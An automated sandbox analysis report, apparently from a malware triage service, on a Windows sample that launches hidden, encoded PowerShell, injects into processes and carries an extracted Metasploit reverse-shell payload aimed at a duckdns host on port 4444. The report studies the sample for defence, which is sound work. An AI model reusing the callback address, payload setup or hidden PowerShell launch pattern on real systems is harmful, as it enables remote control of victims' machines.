Analysis

max time kernel: 31s
max time network: 42s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-09-2024 05:16
Static task: static1

Behavioral task: behavioral1
  Sample: d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
Errors
General

Target: d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
Size: 318KB
MD5: d39fccd98f2225bba9db7ba4636ceef3
SHA1: a333cbb04d50cc455c2084933b21bbb2ef370a4f
SHA256: f2ca01177834859fa2f60bc1d060949ea88c15e38aa2de021f16dfdcea804724
SHA512: e8d8c36f30f0072db21ed2a7c1e3cc4c0301b83d8348d1f474fac9e2228a1666c548da2bca1c8d539dac0cfaf09422659df3a62cb9b2e02876794773b132b0f3
SSDEEP: 6144:wtNb6TiU8liKNKCkC2Uus2czyD6FOWqxVyliAy7O6KLRvv7D:wtN+PznJTfc+mjpU/OtpD
Malware Config

Extracted: metasploit
  encoder/shikata_ga_nai

Extracted: metasploit
  windows/reverse_tcp_dns
  hacker2386.duckdns.org:4444
Signatures

MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Blocklisted process makes network request (2 IoCs)
  flow | pid | Process
  15 | 1636 | powershell.exe
  15 | 1636 | powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Runs PowerShell and hides the display window.
  pid | Process
  3236 | powershell.exe
  2424 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up the country code configured in the registry, likely for geofencing.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | Process
  2424 | powershell.exe
  2424 | powershell.exe
  3236 | powershell.exe
  3236 | powershell.exe
  1636 | powershell.exe
  1636 | powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2424 | powershell.exe
  Token: SeDebugPrivilege | 3236 | powershell.exe
  Token: SeDebugPrivilege | 1636 | powershell.exe

Suspicious use of WriteProcessMemory (13 IoCs)
  description | pid | Process | procid_target
  PID 1484 wrote to memory of 2424 | 1484 | d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe | 83
  PID 1484 wrote to memory of 2424 | 1484 | d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe | 83
  PID 2424 wrote to memory of 3236 | 2424 | powershell.exe | 85
  PID 2424 wrote to memory of 3236 | 2424 | powershell.exe | 85
  PID 3236 wrote to memory of 1636 | 3236 | powershell.exe | 88
  PID 3236 wrote to memory of 1636 | 3236 | powershell.exe | 88
  PID 3236 wrote to memory of 1636 | 3236 | powershell.exe | 88
  PID 1636 wrote to memory of 4628 | 1636 | powershell.exe | 90
  PID 1636 wrote to memory of 4628 | 1636 | powershell.exe | 90
  PID 1636 wrote to memory of 4628 | 1636 | powershell.exe | 90
  PID 4628 wrote to memory of 4460 | 4628 | csc.exe | 91
  PID 4628 wrote to memory of 4460 | 4628 | csc.exe | 91
  PID 4628 wrote to memory of 4460 | 4628 | csc.exe | 91
Processes

1. C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe"
   PID: 1484
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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
      PID: 2424
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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
         PID: 3236
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc 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
            PID: 1636
            - Blocklisted process makes network request
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
               Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.cmdline"
               PID: 4628
               - System Location Discovery: System Language Discovery
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES885A.tmp" "c:\Users\Admin\AppData\Local\Temp\ecwugerd\CSCF614E8EAB1614B4583BD7E6B30F7CAD6.TMP"
                  PID: 4460
                  - System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads